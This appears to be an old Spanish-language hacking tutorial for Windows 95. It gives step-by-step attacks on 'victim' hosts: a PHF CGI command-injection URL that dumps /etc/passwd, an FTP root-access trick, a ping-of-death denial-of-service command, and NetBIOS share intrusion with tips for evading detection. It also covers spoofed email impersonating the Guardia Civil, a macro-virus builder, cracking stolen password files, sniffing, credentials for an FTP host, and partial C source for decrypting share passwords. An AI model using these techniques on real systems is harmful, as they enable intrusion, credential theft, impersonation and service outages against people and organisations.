El win95 es un sistema operativo de 32 bits multitarea, que es muy comodo para la gente que busca facilidad, pero no te enga¤es pensando que es un sistema ideal para Internet, puede que para un usuario convencional le sea estupendo pero para un Hacker se queda muy corto de calle, ya que le falta muchos servicios que otros sistemas operativos si traen como el que ya tantas veces he repetido, el Unix (se nota que me encanta??:).
Aqui os dejo de dar la murga sobre win95 ya que este texto no esta destinado a hablar sobre este sistema sino a usarlo para hackear. Ademas no creo que este contando nada nuevo sobre windows o sea que mejor me callo y si no sabes mucho sobre win95, pues ya sabes comprate un libro.
2a. Seguridad En Windows.
Como todos sabemos la seguridad en win95 es nula, es decir, win95 no tiene seguridad por si mismo, un claro ejemplo de esto que es las entanas que nos piden un password las podemos cerrar pulsando sobre la X o tambien nos basta con pulsar ctrl+atl+supr, con lo que nos salteremo esta ventana sin meter ningun password.
Por eso para que nuestro ventanas (nombre que se le da a win95:) tendremos que instalarle algun paquete de seguridad disponible por la red, que hay muchos y buenos y lo mejor es que son Freeware (gratis) aunque siempre puedes comprar algun paquete comercial de seguridad, en mi opinion alguna veces una tonteria, ya que nos pueden cobrar un precio abusivo y cuando llega la oportunidad de demostrar su calidad nos falla, ya que no hay nada seguro 100%.
Proteger nuestro win95 es cosa de cada uno pero tranquilidad, que la cosa no es muy dificil, es cuestion de estar atento a las novedades, en otras palabras estar informado. Mas abajo ya te entereras de estas cosas.
3. Protocolo TCP/IP y Demas Historias.
El protocolo TCP/IP, es el mas usado y seguramente no lo sabias, ya que engloba casi todos los servicios que solemos usar como por ejemplo cuando hacemos telnet, mail, ftp o cualquier cosa.
TCP/IP proviene de Transmission Control Protocol y Internet Protocol respectivamente. Por fortuna para los usuarios de win95, este protocolo ya viene incorporado nativamente en el sistema, al contrario que ocurria con el windows 3.x, el cual lo teniamos que instalar para poder conectar a Internet.
Como has podido comprobar en realidad son 2 protocolos pero que estan unidos, el primero o sea el TCP es el encargado de las comunicaciones y de la transmision de los paquetes cuando estamos conectados a un servidor. El IP es el encargado de que los paquetes llegen a destino por orden aunque tomen caminos diferentes.
* Diagrama del TCP *
cliente -> El cliente le envia una -> servidor
solicitud de conexion
espeficicando el puerto
de conexion al servidor.
cliente <- El servidor le responde <- servidor que conoce su peticion de conexion. cliente -> El cliente le devuelve <- servidor otra vez la peticion y el circuito ya esta abierto. * Diagrama del IP * ³Informacion general³Direccion IP³Direccion IP³Datos³ ³de cabezera. ³de origen ³de destino. ³ ³ Pues aqui se acaba la explicacion basica de este protocolo, para el que este interesado en profundizar le remito a que se pille el RFC 1180 o un fichero disponible en multitud de servidores, desgraciadamente no te puede asegurar el nombre del fichero ya que lo he encontrado de varias formas pero te dare el nombre que aparece al editarlo, ya que en todos es igual: Introduction to the Internet Protocols C R C S Computer Science Facilities Group C I L S RUTGERS The State University of New Jersey 3 July 1987 3a. Puertos Antes ya os he explicado muy brevemente la comunicacion del protocolo en cuestion. Pues ahora os pongo una extensa lista sobre los distintos puertos y sus servicios correspondientes. echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp systat 11/tcp users daytime 13/tcp daytime 13/udp netstat 15/tcp qotd 17/tcp quote qotd 17/udp quote chargen 19/tcp ttytst source chargen 19/udp ttytst source ftp-data 20/tcp ftp 21/tcp telnet 23/tcp smtp 25/tcp mail time 37/tcp timserver time 37/udp timserver rlp 39/udp resource # resource location name 42/tcp nameserver name 42/udp nameserver whois 43/tcp nicname # usually to sri-nic domain 53/tcp nameserver # name-domain server domain 53/udp nameserver nameserver 53/tcp domain # name-domain server nameserver 53/udp domain mtp 57/tcp # deprecated bootp 67/udp # boot program server tftp 69/udp rje 77/tcp netrjs finger 79/tcp link 87/tcp ttylink supdup 95/tcp hostnames 101/tcp hostname # usually from sri-nic iso-tsap 102/tcp dictionary 103/tcp webster x400 103/tcp # ISO Mail x400-snd 104/tcp csnet-ns 105/tcp pop 109/tcp postoffice pop2 109/tcp # Post Office pop3 110/tcp postoffice portmap 111/tcp portmap 111/udp sunrpc 111/tcp sunrpc 111/udp auth 113/tcp authentication sftp 115/tcp path 117/tcp uucp-path 117/tcp nntp 119/tcp usenet # Network News Transfer ntp 123/udp ntpd ntp # network time protocol (exp) nbname 137/udp nbdatagram 138/udp nbsession 139/tcp NeWS 144/tcp news sgmp 153/udp sgmp tcprepo 158/tcp repository # PCMAIL snmp 161/udp snmp snmp-trap 162/udp snmp print-srv 170/tcp # network PostScript vmnet 175/tcp load 315/udp vmnet0 400/tcp sytek 500/udp biff 512/udp comsat exec 512/tcp login 513/tcp who 513/udp whod shell 514/tcp cmd # no passwords used syslog 514/udp printer 515/tcp spooler # line printer spooler talk 517/udp ntalk 518/udp efs 520/tcp # for LucasFilm route 520/udp router routed timed 525/udp timeserver tempo 526/tcp newdate courier 530/tcp rpc conference 531/tcp chat rvd-control 531/udp MIT disk netnews 532/tcp readnews netwall 533/udp # -for emergency broadcasts uucp 540/tcp uucpd # uucp daemon klogin 543/tcp # Kerberos authenticated rlogin kshell 544/tcp cmd # and remote shell new-rwho 550/udp new-who # experimental remotefs 556/tcp rfs_server rfs# Brunhoff remote filesystem rmonitor 560/udp rmonitord # experimental monitor 561/udp # experimental garcon 600/tcp maitrd 601/tcp busboy 602/tcp acctmaster 700/udp acctslave 701/udp acct 702/udp acctlogin 703/udp acctprinter 704/udp elcsd 704/udp # errlog acctinfo 705/udp acctslave2 706/udp acctdisk 707/udp kerberos 750/tcp kdc # Kerberos authentication--tcp kerberos 750/udp kdc # Kerberos authentication--udp kerberos_master 751/tcp # Kerberos authentication kerberos_master 751/udp # Kerberos authentication passwd_server 752/udp # Kerberos passwd server userreg_server 753/udp # Kerberos userreg server krb_prop 754/tcp # Kerberos slave propagation erlogin 888/tcp # Login and environment passing kpop 1109/tcp # Pop with Kerberos phone 1167/udp ingreslock 1524/tcp maze 1666/udp nfs 2049/udp # sun nfs knetd 2053/tcp # Kerberos de-multiplexor eklogin 2105/tcp # Kerberos encrypted rlogin rmt 5555/tcp rmtd mtb 5556/tcp mtbd # mtb backup man 9535/tcp # remote man server w 9536/tcp mantst 9537/tcp # remote man server, testing bnews 10000/tcp rscs0 10000/udp queue 10001/tcp rscs1 10001/udp poker 10002/tcp rscs2 10002/udp gateway 10003/tcp rscs3 10003/udp remp 10004/tcp rscs4 10004/udp rscs5 10005/udp rscs6 10006/udp rscs7 10007/udp rscs8 10008/udp rscs9 10009/udp rscsa 10010/udp rscsb 10011/udp qmaster 10012/tcp qmaster 10012/udp La verdad es que no te quejaras :) de esta lista. Si quieres mas informacion sobre los puertos con su debida explicacion mirate el RFC 1060. 3b. Ftp. Supongo que a estas alturas sabras lo que es el FTP, File Transfer Protocol o sea Protocolo de Transferencia de Ficheros y como podras observar en el listado de los puertos al FTP le corresponde el 21. Este servicio hay que conocerlo muy bien ya que ademas que nos sirve para subir o bajar ficheros tambien nos puede ayuda en nuestros propositos :), por supuesto el hacking. Sino dispones de ningun cliente FTP, el propio win95 lleva incorporado uno, el unico problema es que no es muy vistoso ya que funciona en modo MS-DOS pero es muy versatil y perfecto para nosotros. Para ejecutarlo basta que activemos una ventana MS-DOS y en la linea de comados escribamos FTP y se pondra en modo FTP. Un ejemplo seria esto: c:>ftp <- Escribimos FTP. ftp> <- activado el modo FTP. Si no sabes manejarlo, escribiendo un "?" o "help" saldran todos los comandos disponibles del FTP, como no viene a cuento no los explicare pero buscando por hay podras hallar informacion de lo que hace cada cosa pero lo mejor es que lo averigues tu solito. 3c. Telnet. Por suerte los usuarios de win95 con el telnet tienen mas suerte o menos segun se mire, ya que el servico de Telnet de win95 que tambien esta incorporado en el sistema, es muy facil de manejar y ademas tiene ventana propia. Por eso si ejecutamos telnet se abrira una ventana y lo unico que tenemos que hacer es ir al menu en la opcion "conectar" y dentro de aquí la de "sistema remoto", entonces se activara otra ventana en la que nos saldra tres opciones, la primera "nombre de host" es donde queremos conectar, "puerto" a que puerto conectamos, por defecto el 23 y por ultimo tenemos "tipo de terminal" que no hace falta cambiarlo. El telnet es importante ya que es asi como entramos a una cuenta en un servidor y podremos hacer lo que tengamos permitido en el sistema. Logicamente entraremos en una cuenta si tenemos el login y password. 4. Hacking Basico En Windows. Por fin ya se a acabo el latazo de la explicacion de como moverse por win95. Ahora ya podemos empezar a jugar un poco por inet :), siempre por puro placer pero jamas con malos fines. En esta seccion os explicare varias maneras de hacking usando el win95 a pelo o sea sin utilizar ninguna herramienta externa. 4a. Phf. La primera tecnica ya es muy conocida y la verdad es que tendremos suerte si nos funciona pero todavia sigue vigente y doy fe de ello }:-) solo hay que saber buscar y tener paciencia. Para que esto nos funcione solo tenemos que tener un navegador instalado en nuesto win95, por defecto suele venir el IE o sea que no podras decir que no tienes, siempre y cuando hallas instalado los paquetes extras. Lo que tenemos que hacer es ir con nuestro navegador a algun servidor que corra sobre unix (muchos). Conectamos con un servidor en cuestion, www.victima.com, ya estamos viendo su web, llegados aqui, a esa linea le añadimos: http://www.victima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd Como ya he dicho si todo sale bien nos aparecera el fichero de passwords del servidor con lo que solo nos queda grabarlo en nuestro HD. Por supuesto el PHF tiene muchas variantes por eso te aconsejo que busce algo que profundice en esta tecnica al igual que tambien busce informacion sobre el fichero passwd de unix para comprenderlo. 4b. Ftp. Antes ya te he explicado el funcionamiento del FTP de win95, ahora lo usaremos para sacer el fichero de password de un servidor. Desde una ventana del MS-DOS llamamos al programa FTP y escribimos: ftp> open victima.com
Conect to victima.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> dir (o lo que querramos)
Y como siempre es el caso si todo sale bien estaremos metidos en el sistema como root (en lenguaje unix significa el superusuario, o sea el que controla el servidor). Por desgracia esta tecnica es muy antigua por lo que mas seguro no funcionara pero todo es posible.
4c. Ping De La Muerte.
Esta tecnica no es propia de un Hacker sino de un Lamer (no quiero decir Cracker para no ofender a nadie :) ya que unicamente sirve para tirar un servidor o sea que se desconecta de Internet y esto puede representar grandes perdidas a una empresa. Con esto solo os quiero decir que aunque aqui os lo explicare no es cuestion que lo useis por Internet atacando servidores.
La utilidad Ping sirve principalmente para saber si un servidor esta activo y ademas podemos calcular el trafico en la red segun el tiempo de su respuesta. Basicamente se le envia un paquete a un servidor y este nos contesta, solo que si se le envia un paquete muy grande puede llegar desordenado, por lo que el servidor pide al origen que le vuelva a enviar una parte o la totalidad del paquete, por lo que se produce un datagrama del ping muy grande y producira su caida. Para ejecutar este ataque solo tenemos que escribir:
c:>ping -l 65510 victima.com
Pues esta simple linea es muy destructiva, por lo que tened cuidado y antes de hacer tonterias leed la parte sobre seguridad de la guia.
4d. Recursos Compartidos.
Como win95 NO tiene seguridad nos permite colarnos en el disco duro de otra persona por Internet y lo mejor del caso es que esta tecnica nos la proporciona los propios programas del win95. Por supuesto no todo es tan sencillo ya que hay que cumplir unos requisitos. Esto se debe a una mala configuracion del propio usuario al no configurar adecuadamente los recursos compartidos de su red corriendo sobre win95.
Para colarnos en el HD de otro ordenador debenos tener nuestro ordenador bien configurado, o sea el compartir recursos bien puesto y tambien tener el Netbios instalado. Para configurarlo, tenemos que tener activado la opcion de "compartir ficheros e impresoras" en MIPC->Panel de Control->Red.
SI por el caso la opcion esta desactivada simplemente pulsamos el boton de "añadir" y añadimos el servicio "Compartir ficheros e impresoras en redes Microsoft". En la misma ventana, debemos tener el "Primer inicio de sesion" en "Cliente para redes Microsoft". Tambien tiene que estar activado el "Cliente para redes Microsoft", que viene por defecto en MIPC->Acceso Telefonico a Redes->Conexion a Inet que usaremos->boton derecho-> propiedades, debiendo estar activada la casilla "conectarse a la red".
Ahora ya podemos ponernos manos a la obra, entonces volvemos a una ventana del MS-DOS y ejecutamos:
c:>nbtstat -A (IP DE LA VICTIMA)
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
VICTIMAMACHINE <00> UNIQUE Registered
VICTIMAGROUP <00> GROUP Registered
VICTIMAMACHINE <03> UNIQUE Registered
VICTIMAMACHINE <20> UNIQUE Registered
VICTIMAGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
Cuando ejecutamos este comando nos saldra una tabla como esta y el primer 'UNIQUE' de tipo <00> es el nombre de la victima y como puedes ver la maquina se llama VICTIMAMACHINE.
Entonces ahora creamos/editamos el archivo LMHOSTS, si por el caso encontrais uno que pone LMHOSTS.SAM no lo toqueis, poniendo la direccion IP y el nombre de la maquina en cuestion, esto seria de la siguiente forma:
c:>edit c:windowssystem32LMHOSTS
VICTIMAMACHINE
Entonces cerramos el fichero y desde un ventana del MS-DOS ejecutamos un comando para añadir el ordenador de la victima a nuestro Netbios y esto seria de la siguiente forma:
c:>NBTSTAT -R
Ahora nos interesa saber que recursos comparte la victima y esto tampoco nos traera complicacion alguna:
c:>net view VICTIMAMACHINE
Shared resources at VICTIMAMACHINE
Sharename Type Comment
-----------------------------------------
BANCO Disk
Y como podemos observar comparte una carpeta llamada BANCO.
Ahora ya podemos operar como si fuese una terminal mas en nuestra red local sobre win95. Ya solo nos queda ejecutar el comando que querramos, si por ejemplo queremos ver el contenido, solo tenemos que escribir:
c:> dir VICTIMAMACHINEBANCO
O para leer cualquier fichero de la carpeta:
c:> type VICTIMAMACHINEBANCOCUENTABANCARIA.TXT
Si queremos conectar al recurso compartido de forma grafica (o sea con una ventana y no seguir usando el MS-DOS), solo tenemos que pulsar INICIO->BUSCAR PC y dentremos el PC remoto pero esto solo es posible si hemos añadido la VICTIMAMACHINE a una unidad de red a la que podamos llamar, deberemos ejecutar:
c:>NET USE e: MIPCWINDOWS
Esta tecnica solo funciona si la maquina remota ejecuta win95 o win 3.11 y ademas comparte las carpetas sin contrase¤a en modo "Acceso a nivel compartido" MIPC->Panel de control->Red | Control de acceso. Si utilizase el "Acceso a nivel de usuario" nuestro grupo debe estar autorizado en esa maquina. Podemos probar a intentar insertar el grupo de nuestra maquina para que este autorizada, esto lo conseguiremos con el Regedit, por desgracia los sistemas win95 y OSR2 que estan ejecutando el Servidor Web Personal de Microsoft desactivan esta posibilidad de acceso remoto tras informar de la conveniencia de hacerlo al usuario, ya que el servidor web obliga a compartir carpetas aun sin tener red local.
Logicamente un usuario que haya tenido el despiste de conectarse a Internet con carpetas compartidas no toma luego medidas de control sobre quien entra en su maquina. Pero no hay que hacer ilusiones ya que podemos ser pillados si por ejemplo un usuario ejecuta el programa Netwatch, que muestra los usuarios conectados a nuestra computadora en cada momento y por supuesto el nombre de las computadoras por lo que es aconsejable cambiar el nombre de nuestra computadora usando el Regedit. Si nuestra maquina se llama HACKERNOBO cambiamos todas la cadenas donde aperezca este nombre con el Regedit a un nombre menos sospechoso.
Si no conectamos la VICTIMAMACHINE como una unidad mas a nuestra computadora no nos tendremos que preocupar del Netwatch, asi conseguiremos una cierta seguridad personal ya que lo mas seguro, la VICTIMAMACHINE no se dara cuenta de nuestra entrada. Tambien hay que decir que si la VICTIMAMACHINE quiere apagar su computadora le saldra el mensaje del tipo "hay otros usuarios conectados a su ordenador, si apaga se desconectaran" si ocurre esto seremos pillados.
4e. Fake Mail Con El Telnet.
Esta tecnica nos ayuda a suplantar la direccion de correo electronica que querramos :). La verdad es que tiene pocos usos, en mi opinion debido a una serie de razones pero siempre puede servir para gastar una buena broma enviando aun amigo un mail del director de la Universidad diciendo que ha sido expulsado por pirata }:-) y no te cuento si es un mail de la Guardia Civil.
La verdad es que es muy sencillo de hacer pero por supuesto habra que tomar unas ciertas medidas de seguridad, que ya explicare luego. Lo primero que tenemos que hacer es ejecutar el cliente Telnet (sobre el manejo del Telnet ya lo explique mas arriba) y donde pone "puerto" en vez de poner el puerto 23 pondremos el 25 que corresponde al puerto del mail y esperamos a que nos conectemos a ese puerto, cuando conectemos nos saldra un mensaje y esta esperando a que pulsemoa alguna tecla:
220 Howdy From mail.airmail.net running Smail 3.1.30.16 (ESMTP)
[d/o/u/g] ready at Thu, 10 Oct 96 00:03:17 -500 (CDT)
Muchas veces lo que podemos hacer es escribir "help" y saldran todos los comandos, tambien podemos escribir "echo" y la maquina nos contestara que esta lista. Para escribir un mail hay que seguir una serie de pasos:
mail from:gc.uco@mad.servicom.es <- ponemos de donde viene. El servidor nos contesta: 250 ... Sender Okay Ahora escribimos: rcpt to:nob_ody@xxxxxxxx.com <- a quien se lo enviamos. El servidor nos contesta: 250 ... Recipiant Okay Ahora escribimos: data El servidor nos contesta: 354 Enter mail, end with "." on a line by itself Ahora escribimos: To: nob_ody@xxxxxxxx.com From: gc.uco@mad.servicom.es Subject: Te querremos!! Bueno nobody, solo te queremos decir que nos gusta tu trabajo y te querremos fichar para el departamento. Direccion General de la Guardia Civil . <- para terminar el mail. El servidor nos contesta: 250 Mail accepted Ahora escribimos: quit <- ya esta todo listo :) Pues ves como es realmente simple!! Pero antes de empezar a jugar con esta tecnica tenemos que asegurarnos que el servidor de mail no regrista nuestro IP, esto lo podremos averiguar si enviamos un mail de prueba a alguna cuenta anomima que tengamos. Si vemos que en la cabecera del mail sale nuestro IP ese servidor no sirve. Hay listas disponibles por Internet sobre servidores que permiten hacer esto. 4f. Cambiando El Entorno. Esta tecnica no es que sea propia del hacking ya que solo sirve para cambiar la pantalla de inicio o la de finalizar windows. Los logos de windows tienen un formato BMP 320X400 pero estan clamuflados en ficheros con extension SYS pero siguen siendo realmente BMP'S. El logo del principio de windows (ya sabes el de las nubes) lo podeis encontrar como: c:>logo.sys
Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo y grabarlo alli mismo y cuando windows vuelva a reiniciar usara nuestro grafico y si lo volvemos a quitar, usara el de siempre. El logo del final (cuando cierra windows) esta en el directorio windows y lo podemos encontrar como:
c:windows>logos.sys
Logicamente es obligatorio que los graficos que querramos sustituir tengan de tama¤o 320x400 y sean ficheros BMP'S. Conviene que les pongamos el atributo de ocultos, que esto se hace con el comando Attrib, por ejemplo:
c:windows>attrib +h logos.sys <- lo oculta. c:windows>attrib -h logos.sys <- lo hace visible. 4g. Finger. La utilidad Finger, muy usada en Unix, en realidad no esta disponible en Win95 pero como somos Hackers nosotros si que somos capaces desde Win95. Finger se utiliza para obtener informacion de un servidor. Puede parecer una tonteria pero es util, por ejemplo, podemos empezar a sacar los Login's de los usuarios y empezar a adivinar sus passwords, tambien podemos vigilar al root del servidor (cada cuanto tiempo conecta, cuando fue la ultima vez que estuvo, etc...) y asi muchas cosas. La verdad es que para usar el Finger usaremos cualquier navegador, IE o Netscape. Simplemete nos dirigimos a un url un poco especial, es un web que permite hacer Finger a cualquier host y nos deveulve los resultados. Esto se conoce como "Finger Gateway". El url del web es: http://www.hgp.med.umich.edu/cgi-bin/finger 4h. Whois. La utilidad Whois, al igual que Finger es muy comun en Unix y no esta disponible en Win95 pero comos somos asi de listos saldremos del apuro. Tambien sirve para pedir informacion de un servidor pero no el igual que Finger, ya que se diferencian en el tipo de informacion, el finger se suele utilizar mucho para buscar direcciones de correo mientras que el Whois, para averiguar informacion sobre un servidor en concreto. Para usar esta utilidad, ejecutamos el Telnet y nos dirigimos a un host muy especial: c:>telnet whois.internic.net
Por supuesto Internic, una empresa privada norte ameriacana que se encarga de controlar los dominios de Internet, y podemos usar su base de datos para pedir informacion sobre un servidor.
Cuando conectemos a la base de datos de Internic, escribimos "Whois nombre_del_servidor" y nos sacara la informacion.
telnet InterNIC > whois aol.com
Connecting to the rs Database . . . . . .
Connected to the rs Database
America Online (AOL-DOM)
12100 Sunrise Valley Drive
Reston, Virginia 22091
USA
Domain Name: AOL.COM
Administrative Contact:
O'Donnell, David B (DBO3) PMDAtropos@AOL.COM
703/453-4255 (FAX) 703/453-4102
Technical Contact, Zone Contact:
America Online (AOL-NOC) trouble@aol.net
703-453-5862
Billing Contact:
Barrett, Joe (JB4302) BarrettJG@AOL.COM
703-453-4160 (FAX) 703-453-4001
Record last updated on 13-Mar-97.
Record created on 22-Jun-95.
Domain servers in listed order:
DNS-01.AOL.COM 152.163.199.42
DNS-02.AOL.COM 152.163.199.56
DNS-AOL.ANS.NET 198.83.210.28
Como vemos hemos pedido informacion sobre AOL.COM, American On-Line. Y esto es lo que nos ha sacado Internic. Al final podemos ver los dominios asociados a AOL. Pues sencillo y muy util, el whois.
4i. Tracert.
Esta utilidad que si esta implementada en Win95, nos sirve para calcular el tiempo que tarda un paquete de un servidor hasta otro y ademas podemos saber por cuantos servidores pasa. Muy util para sacar posibles servidores victimas si nos llaman la atencion.
Para usar esta utilidad, abrimos una ventana MS-DOS y escribimos Tracert, a secas y nos sacara el menu de opciones disponible.
c:>tracert
Usage:tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.
Pues como veis, no tiene ningun misterio las opciones del Tracert, por lo que ya aprendereis su uso con la experiencia. Ahora escribimos una direccion IP cuando invocamos al Tracert, de la siguente forma:
c:>tracert 198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]
over a maximum of 30 hops:
1 * * * Request timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms glory-cyberport.nm.westnet.net [204.134.78.33]
4 166 ms 228 ms 189 ms enss365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.Albuquerque.t3.ans.net [192.103.74.45]
6 284 ms 296 ms 178 ms f2.t112-0.Albuquerque.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Houston.t3.ans.net [140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.Atlanta.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-aol.ans.net [198.83.210.28]
Trace complete.
Aqui podeis por todos lo sitios que ha pasado el paquete que hemos enviado al IP 198.83.210.28. Y asi podemos con todos los servidores de Internet.
5. Utilizacion De Tools.
En esta seccion os explicare diferentes tools que podeis usar para hacking, por supuesto hay que buscarlas por Internet, no pondre el url para encontrarlas, ya que a lo mejor cuando estas leyendo esta guia ya no existe, pero os dire como se llama el programa asi lo podras buscar ademas esto tambien te servira para que te espabiles y sepas buscar cosas por Internet.
Logicamente esta guia es para win95 y los programas que explicare seran para win95 pero tambien me veo obligado a explicar varias tools que no son de win95 propiamente sino de MS-DOS pero que son necesarias y ademas corren en modo MS-DOS de win95.
5a. Skamwerks lab version 1.1b
Este programa es un util herramienta que nos ayuda a crear de forma rapida virus macro, o sea para el Word. Tiene que estar instalado el Word para que este programa nos funcione.
Al ejecutar el programa nos aparecera una ventana con 2 botones los caules son las 2 opciones que podemos escoger "Virii Wizard" o "Advanced Users".
El "virii Wizard" es la opcion, si no sabemos muy bien como crear un virus de macro ya que nos moveremos por varios menus y crearemos un virus de forma rapida y facilmente. La otra opcion, "Advanced Users" es para aquellos que sepan de Word Basic, el lenguaje de programacion del Word, ya que podemos meter codigo Word basic directamente y asi crear un virus a nuestro gusto.
Como este no es un curso sobre virus, no me voy a enrollar sobre la utilizacion exacta del programa. En mi opinion es un buen programa, en ingles :) programado en C++.
5b. WaReZ! Version 95.12.31
Este programa es un cliente FTP que muestra los directorios ocultos en un servidor, util si nos metemos en algun sitio sospechoso. Como ya es costumbre para que nos funcione tenemos que tener instalado el WINSOCK.DLL correctamente.
Al igual que antes tampoco hay que explicar mucho sobre este programa ya que su Interface es igual que el cliente WS_FTP que suele ser muy familiar para todos, por lo que no encontraremos mucha dificultad en su manejo.
5c. John the ripper v1.4.
Esta magnifica tool no es propiamente de win95 pero seria un pecado no hablar de ella, cuando corre sobre win95 de maravilla (bueno, dentro de lo que cabe :). John, como se le conoce, sirve para crackear un fichero unix de password (el conocido etc/passwd, como ya digo aprended algo de unix).
Cuando robemos un fichero passwd de un servidor, lo que tenemos que hacer es usar el John para sacar cuentas, pero no solo basta esto sino tambien necesitamos un buen diccionario y una combinacion de suerte y paciencia.
Supongamos que ya tenemos todo (fichero passwd, John y un diccionario), entonces tenemos que abrir una ventana MS-DOS y llamar al John, si lo llamamos sin nigun parametro nos saldran un listado de opciones, esto seria asi:
c:>john
Usage: john [flags] [passwd files]
Flags:-pwfile:[,..] specify passwd file(s)
-wordfile: -stdin wordlist mode, read words from or stdin
-rules enable rules for wordlist mode
-incremental[:] incremental mode [using john.ini entry ]
-single single crack mode
-external: external mode, using john.ini entry
-restore[:] restore session [from ]
-makechars: make a charset, will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[,..] crack this (these) user(s) only
-shells:[!][,..] crack users with this (these) shell(s) only
-salts:[!] crack salts with at least accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout: abort session after a period of minutes
-list list each word
-beep -quiet beep or don't beep when a password is found
-noname -nohash don't use memory for login names or hash tables
-des -md5 force DES or MD5 mode
Veis? :), y como siempre no explicare que es cada opcion os lo dejo para que jugueis vosotros solitos!. Ahora, ya podemos crackear el fichero, para ello escogermos la opcion "single", ya que el john no nos pedira un fichero de diccionario, si fuese el caso que no tenemos, ponemos:
c:>john -single passwd
Y el John se pondra a trabajar, cuando halla acabo creara un fichero llamado "John.pot" donde se almacenaran los passwords encriptados con su correspodiente passwords desencriptado (esta definicion no es del todo correcta pero es para que lo entendais) y ya tenemos unas cuentas de acceso al servidor.
Este metodo va bien para la primera pasado con el John pero luego conviene usar un diccionario y con el diccionario seria de la siguiente manera:
c:>john -wordfile:spain.txt passwd
El John seguiria el mismo proceso antes descrito, por supuesto si el fichero "John.pot" esta creado ya, les a¤adira los resultados obtenidos a este fichero, por cierto este fichero tiene atributo de solo lectura.
Pues aqui se acaba la explicacion del John, que seguro que ya aprendereis a manejar correctamente. Referente a los diccionarios hay varias herramientas que corren bajo MS-DOS que crean diccionarios o tambien podeis buscar por Internet ya que hay varios web's llenos de diccionarios.
5d. Gobbler v 2.1.
Volvemos a la carga con otro programa que no es del win95 propiamente, pero es un sniffer que podemos usar bajo win95 en una red Ethernet. Un Sniffer para aquellos que no sepan, es un programa que captura los paquetes que pasan por una red y asi se pueden conseguir logins, passowrds u otro tipo de informacion que querramos, logicamente si los paquetes estan encriptados, esto dificultara el proceso, ya que habra que desencriptarlos si se puede.
Como siempre abrimos una ventana y ejecutamos el programa de la siguiente manera:
c:>gobbler
Y se activara el programa y veremos una serie de ventanas, en este punto, pulsamos el y saldra una ventana con un menu. Ahora tenemos que configurar el programa para nuestra red, la verdad es que es muy sencillo de utilizar, con un poco de practica dominaremos este sniffer facilmente.
Como sugerencia conviene leer el fichero de documentacion que trae, ya que explica como configurar el programa.
5e. Modificando el WS_FTP.
El famoso cliente ftp WS_FTP, se le puede a¤adir un host remoto el cual esconde mucho software interesante. Esta opcion no esta por defecto, simplemente hay que a¤adir una lineas en el fichero "WS_FTP.ini". Tenemos que añadir, al principio del fichero:
[208.128.143.19]
HOST=24.48.3.45
UID=cmw
PWD=636E79
LMASK=
RMASK=
RETRIES=20
PASVMODE=0
COMMENT=
Simple, verdad? Pues ahora cuando le digamos al cliente que se diriga al host 208.128.143.19 (que no es la dirrecion real, pero da igual). Pues que os divertais con esta cuenta :) y coged todo lo que podais, porque a saber cuanto tiempo estara vigente.
5f. Sharepasswd.
Este programa desencripta el passorwd de win95. Esta en lenguaje C, como supongo todo el mundo tiene que tener un compilador en C y si no ya estas buscando uno, que hay muchos y gratis por Internet. No veo la necesidad de explicaros el programa ya que tambien incluyo la explicacion del autor la cual esta muy bien, logicamente.
/* This program takes an 'encrypted' Windows 95 share password and decrypts it
* Look at:
* HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionNetworkLanMan
* to find a machine's shares. Within the data for each share are two
* registry entries, Parm1enc and Parm2enc. Parm1enc is the "Full access"
* password. Parm2enc is the "Read only" password.
*
* David Ross 2/9/96
* snakey@cs.umd.edu
*
* Do not distribute this program for any commercial purpose without first
* contacting me for permission.
*
* DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
*
* A technical description of the 'code' can be found later on in this
* document.
*
* Oh yeah... a totally unsolicited self promotion here... If anyone has
* a job for a junior year Computer Science student for summer '96, please
* let me know! I'm familiar with Windows and Mac networking (especially
* involving TCP/IP), fluent in C and C++, and working on becoming a
* proficient Windows programmer.
*
*/
#include
#include
#define BUFFER 30
int DecodeCharOne(unsigned char *);
int DecodeCharTwo(unsigned char *);
int DecodeCharThree(unsigned char *);
int DecodeCharFour(unsigned char *);
int DecodeCharFive(unsigned char *);
int DecodeCharSix(unsigned char *);
int DecodeCharSeven(unsigned char *);
int DecodeCharEight(unsigned char *);
main() {
int i; /* Generic counter */
int eocc = 0; /* Records if there has been an error */
/* The following structure stores the encoded bytes. Decoded values
* replace the encoded values as the decoding process moves along
* The initial values show here are not used and are unimportant
*/
unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
unsigned short tempshort; /* Used as a go-between from sscanf() to
mybytes[] so unaligned data accesses
don't occur */
int goupto = 0; /* Records how many characters there are to be decoded */
/* The following code handles input */
char inpt[BUFFER];
char *inptptr;
printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
fgets(inpt, BUFFER, stdin);
inptptr = strtok(inpt, " ");
if (inpt[0] != ' ')
while ((inptptr != NULL) && (goupto < 8)) {
sscanf(inptptr, "%hx", &tempshort);
mybytes[goupto++] = tempshort;
inptptr = strtok(NULL, " ");
}
/* Decode all the characters. I could have made this stop immediately
* after an error has been found, but it really doesn't matter
*/
if (!DecodeCharOne(&mybytes[0])) eocc = 1;
if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
